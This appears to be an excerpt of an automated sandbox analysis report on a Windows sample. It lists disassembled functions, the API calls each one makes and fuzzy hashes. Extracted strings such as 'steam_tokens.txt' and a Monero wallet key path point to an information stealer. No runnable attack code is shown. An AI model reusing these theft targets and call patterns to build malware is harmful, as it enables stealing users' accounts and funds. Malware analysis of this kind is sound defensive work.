Part of subcall function 6CAF5B50: EnterCriticalSection.KERNEL32(6CB5F688,?,?,?,6CAF56EE,?,00000001), ref: 6CAF5B90
Part of subcall function 6CAF5B50: LeaveCriticalSection.KERNEL32(6CB5F688,?,?,?,6CAF56EE,?,00000001), ref: 6CAF5BD8
Part of subcall function 6CAF5B50: GetTickCount64.KERNEL32 ref: 6CAF5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CAD30BE

Part of subcall function 6CAD30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CAD3127
Part of subcall function 6CAD30F0: __aulldiv.LIBCMT ref: 6CAD3140

Part of subcall function 6CB0AB2A: __onexit.LIBCMT ref: 6CB0AB30

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: ca813afb4c0ef2dfce937746bc46ed06776d6c1d29ace4b5d2eae9dcfb01b1a5
Instruction ID: 48d38d3b86892fb135c74cab21f1e8c18038a95d850e4c975176215e8da3b77b
Opcode Fuzzy Hash: ca813afb4c0ef2dfce937746bc46ed06776d6c1d29ace4b5d2eae9dcfb01b1a5
Instruction Fuzzy Hash: 5EF0A922E2078896CA10EF7489915EBF774AF6B114F915719E89467591FB2071DCC381

Function 00AC9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00AC9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00AC94A5
CloseHandle.KERNEL32(00000000), ref: 00AC94AF

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 49e6ca7f858af515fb9aee51dfec80ba02be71b0f662a51e7e6dd41cb86636f5
Instruction ID: bc51145f403b4c3c9ee29eb403a2e16b524f673f71595d5263f77b5c45817137
Opcode Fuzzy Hash: 49e6ca7f858af515fb9aee51dfec80ba02be71b0f662a51e7e6dd41cb86636f5
Instruction Fuzzy Hash: 67F0307490020CABDB04DF94DD4AFFDB774EB08700F004458BA0997290D6B06E85CB91

Function 00AB1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AB112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00AB1132
ExitProcess.KERNEL32 ref: 00AB1143

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: f68f67793049c93a8492873764c57c0e039acc2014d111d92c17080d303c6a55
Instruction ID: 22d076ea322e205f24519976eb15e0e2c7b6df66d8bce31167965995d5723a9b
Opcode Fuzzy Hash: f68f67793049c93a8492873764c57c0e039acc2014d111d92c17080d303c6a55
Instruction Fuzzy Hash: 48E086B0A45308FBE7106BA0DC0AB5CB67CAB04B41F500044F70C761C0C6F42600DA9A

Function 00AB6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9043c1b75b3b70c68bfdbc9224d903f642cf873b2291ca15a478679f04ce7c0b
Instruction ID: 39718c843de134295c3fd3b5ba91c8ba1cb9a3e754c79e5d9337ae59fbbfe8a5
Opcode Fuzzy Hash: 9043c1b75b3b70c68bfdbc9224d903f642cf873b2291ca15a478679f04ce7c0b
Instruction Fuzzy Hash: 80611AB4D00218DFCB14DFA4EA84BEEB7B8BB04304F148598E41967282D779AF94DF91

Function 00AC70D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00AC718C

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: c053991b313ea7e8df5ae0d4daef32df288ee39c67e9e0c60975a7a59b7e210a
Instruction ID: 46ca307966daa96913fdc2f14030e81db464aca8048d8d65e05f1d4699ac648f
Opcode Fuzzy Hash: c053991b313ea7e8df5ae0d4daef32df288ee39c67e9e0c60975a7a59b7e210a
Instruction Fuzzy Hash: 20519EB0D042189BDB24EBA0DD85FEEB374AF14304F2541ADE21576281EB746E88CF55

Function 00AC5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA820: lstrlen.KERNEL32(00AB4F05,?,?,00AB4F05,00AD0DDE), ref: 00ACA82B
Part of subcall function 00ACA820: lstrcpy.KERNEL32(00AD0DDE,00000000), ref: 00ACA885

lstrlen.KERNEL32(00000000,00000000,00AD0ACA), ref: 00AC512A

Strings

steam_tokens.txt, xrefs: 00AC513F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: ce0f776263e3f589b51a3a51f481867df9ed2021fade9812458600d100f89f67
Instruction ID: fc58dcb43a23a506dfc1840e685933254318db0fac3df45de9044e1b9489678f
Opcode Fuzzy Hash: ce0f776263e3f589b51a3a51f481867df9ed2021fade9812458600d100f89f67
Instruction Fuzzy Hash: 72F0FB71D1010866CB14F7B0DE56FFD733CAA64344F41425DB41766092EE256609CBA2

Function 00AC7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00AD0E2C), ref: 00AC7F00
wsprintfA.USER32 ref: 00AC7F16

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 2d1c50585bf566ade04a1c18f0e9e63a5796e147a9e86cc2858abe92a1072e2e
Instruction ID: c9791f7959804b4c3cb265ba8dbe8f74104611ffdab041fb79f0dcc69f8b53b9
Opcode Fuzzy Hash: 2d1c50585bf566ade04a1c18f0e9e63a5796e147a9e86cc2858abe92a1072e2e
Instruction Fuzzy Hash: BEF06DB1A44218EBCB10DF94DC45FAAFBBCFB48A24F00466AF51592280D7756904CBE1

Function 00ABB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

lstrlen.KERNEL32(00000000), ref: 00ABB9C2
lstrlen.KERNEL32(00000000), ref: 00ABB9D6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 92d9eab43e0535dbbda7cebf4a391e184c60be264fdd9b5dfc70bc6803b1becc
Instruction ID: 524b5e3b2ebb721ce3ae59844a768c11644f28653a4a9e2f4b2c094e76545f53
Opcode Fuzzy Hash: 92d9eab43e0535dbbda7cebf4a391e184c60be264fdd9b5dfc70bc6803b1becc
Instruction Fuzzy Hash: 6DE1DD7291011CABDB14EBA0DE96FFEB338BF64304F41455DF506A60A1EF346A49CB62

Function 00ABAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

lstrlen.KERNEL32(00000000), ref: 00ABB16A
lstrlen.KERNEL32(00000000), ref: 00ABB17E

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
